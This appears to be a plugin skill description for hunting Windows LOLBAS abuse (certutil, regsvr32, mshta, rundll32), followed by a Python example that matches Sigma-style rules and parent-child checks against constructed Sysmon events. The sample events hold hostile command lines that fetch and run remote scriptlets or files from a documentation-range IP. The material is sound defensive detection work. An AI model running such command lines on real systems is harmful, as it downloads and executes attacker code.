From cybersecurity-skills
Detects abuse of trusted Windows binaries (certutil, regsvr32, mshta, rundll32) by analyzing process telemetry, Sigma rules, and parent-child process relationships for threat hunting and SOC investigations.
Slash command: /cybersecurity-skills:detecting-living-off-the-land-with-lolbas
Living Off the Land Binaries, Scripts, and Libraries (LOLBAS) are legitimate system utilities abused by attackers to execute malicious actions while evading detection. This skill covers detecting abuse of certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe, msbuild.exe, and other LOLBins using process telemetry from Sysmon and Windows Event Logs, combined with Sigma rule-based detection.
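The detection approach the skill describes (Sysmon Event ID 1 process telemetry, Sigma-style selections on Image and CommandLine, and a parent-child check) worked through in Python. This is an added example, not code from the skill or its repository: the event records are constructed, the four rules are simplified ones written for this example rather than rules copied from the public Sigma repository, and only the Sigma `contains` and `endswith` modifiers are implemented.

```python
"""Hunting LOLBAS abuse in Sysmon Event ID 1 (process creation) telemetry.

Added example, not code from the skill. Events are constructed records that
carry the Sysmon fields Image, CommandLine and ParentImage. Rules use a
Sigma-like selection syntax (field|modifier -> values) but are simplified:
only the `contains` and `endswith` modifiers are implemented, and the rules
are written for this example, not copied from the public Sigma repository.
"""
import ntpath  # Windows path handling even when run on a non-Windows analyst box

# Constructed sample: four abusive invocations and two benign baselines.
# 203.0.113.0/24 is a documentation range; the paths are typical, not captured.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/p.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"":close")',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";GetObject("script:http://203.0.113.5/x.sct")',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",  # benign: list personal cert store
     "CommandLine": "certutil.exe -store My",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",  # benign: Control Panel launch
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Sigma-style selections: every field in a selection must match (AND),
# any value in a field's list is enough (OR). Matching is case-insensitive.
RULES = [
    {"title": "Certutil download or decode",
     "selection": {"Image|endswith": ["\\certutil.exe"],
                   "CommandLine|contains": ["-urlcache", "-decode", "-decodehex", "-verifyctl"]}},
    {"title": "Regsvr32 scriptlet (squiblydoo)",
     "selection": {"Image|endswith": ["\\regsvr32.exe"],
                   "CommandLine|contains": ["scrobj.dll", "/i:http", "/i:ftp"]}},
    {"title": "Mshta inline script or remote HTA",
     "selection": {"Image|endswith": ["\\mshta.exe"],
                   "CommandLine|contains": ["vbscript:", "javascript:", "http://", "https://"]}},
    {"title": "Rundll32 inline JavaScript",
     "selection": {"Image|endswith": ["\\rundll32.exe"],
                   "CommandLine|contains": ["javascript:", "runhtmlapplication"]}},
]

# Parent-child check: a LOLBin spawned by an Office app is document-borne execution.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
LOLBINS = ("certutil.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe", "msbuild.exe")


def _field_matches(event, key, values):
    """Evaluate one 'field|modifier' entry of a selection against an event."""
    field, _, modifier = key.partition("|")
    actual = event.get(field, "").lower()
    wanted = [v.lower() for v in values]
    if modifier == "endswith":
        return any(actual.endswith(v) for v in wanted)
    if modifier == "contains":
        return any(v in actual for v in wanted)
    return actual in wanted  # no modifier: exact (case-insensitive) match


def match_sigma(event, rule):
    """True when every field of the rule's selection matches the event."""
    return all(_field_matches(event, k, v) for k, v in rule["selection"].items())


def parent_child_anomaly(event):
    """True when a LOLBin's parent is an Office application."""
    child = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    return child in LOLBINS and parent in OFFICE_PARENTS


def hunt(events):
    """Return (event index, finding) pairs; one event may yield several."""
    findings = []
    for i, ev in enumerate(events):
        for rule in RULES:
            if match_sigma(ev, rule):
                findings.append((i, rule["title"]))
        if parent_child_anomaly(ev):
            findings.append((i, "Office parent spawned LOLBin"))
    return findings


if __name__ == "__main__":
    for idx, title in hunt(SAMPLE_EVENTS):
        print(f"[{idx}] {title}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Two caveats a practitioner would add before deploying something like this. First, the command-line rules alone are noisy: `certutil -urlcache` appears in some legitimate update and CRL-fetch scripts, and rundll32 is among the busiest processes on a Windows host, so baseline parent images (and, with Sysmon's Signed/Signature fields, the signer) per environment before alerting. Second, the matcher here is a teaching stand-in; in production the Sigma rules are converted for the SIEM with the sigma-cli/pySigma toolchain rather than evaluated by hand, and the parent list should be extended with browsers and script hosts as the environment warrants.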
Install: npx claudepluginhub costrict-plugins-repo/mukul975-anthropic-cybersecurity-skills-cybersecurity-skills